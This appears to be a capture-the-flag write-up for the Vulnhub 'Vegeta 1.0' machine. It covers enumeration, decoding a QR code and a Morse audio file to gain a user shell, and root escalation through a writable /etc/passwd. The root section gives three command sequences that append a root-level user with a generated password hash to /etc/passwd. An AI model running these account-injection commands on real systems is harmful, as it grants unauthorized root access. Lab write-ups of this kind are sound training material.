Vulnhub: Vegeta 1.0

Vegeta is one of the characters in Dragon Ball Series

Interesting box and let's do this!

Enumeration

Let’s do nmap first and see what do we get.

22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.38

Port 80

Port 80

First thing first let's enumerate more if we can see any files or directories.

Gobuster Results

Lets open robots.txt first. Did we found a directory?

Inside robots.txt

We got a html file but its nothing except Vegeta-1.0?

find_me.html

As we open the source code we found a base64 encoded at the end of the page! After decoding it two times with base64 we get a QR Code.

QR Code

Let's see what do we get here.

zbarimg <image file>

Zbarimg Results

We got a possible password but actually it is a rabbit hole haha. So after I got some hints to enumerate more that's when I thought maybe we should use a custom wordlist of Dragonball characters? Lets Gobuster again with our new custom wordlist (You can get in the references below)

Gobuster with Custom Wordlist

As we go inside the directory we found an audio file.

Inside bulma directory

As we open the audio we can confirm that it is a MORSE CODE audio!

First User (trunks)

Let's decode the audio file using and online morse code decoder.

Decode Morse Code Audio

We got a credential and we got our first user!

Trunks Shell

Root

As we got a user now lets use linpeas for more information.

Linpeas Result

Okay that what we want to see! A writeable /etc/passwd !! There are a few ways for this but I choose these 3 using Perl, Python and OpenSSL.

First (Perl)

We can read .bash_history in the trunks directory.

.bash_history

Just follow these 4 steps and we will get to the root!

#First
perl -le 'print crypt("Password@973","addedsalt")'
#Second
echo 'Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd
#Third
su Tom
#Fourth
Password : Password@973

Second (Python)

#First
python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'
#Second
echo 'Tom:$6$salt$3aEJgflnzWuw1O3tr0IYSmhUY0cZ7iBQeBP392T7RXjLP3TKKu3ddIapQaCpbD4p9ioeGaVIjOHaym7HvCuUm0:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd
#Third
su Tom
#Fourth
Password : pass

Third (OpenSSL)

#First
openssl passwd -1 -salt Tom pass123
#Second
echo 'Tom:$1$Tom$3BObOqrD3qG2Zs.sgxkf4.:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd
#Third
su Tom
#Fourth
Password : pass123

If there is any suggestion please tell me or if there is something that I can improve also please do tell me. Hope this writeup help anyone and let’s learn together :)

H0j3n

References

1. https://www.systutorials.com/docs/linux/man/1-zbarimg/
2. https://github.com/H0j3n/Encounter_Wordlist/blob/master/dragonball_character.txt
3. https://morsecode.world/international/decoder/audio-decoder-adaptive.html
4. https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
5. https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/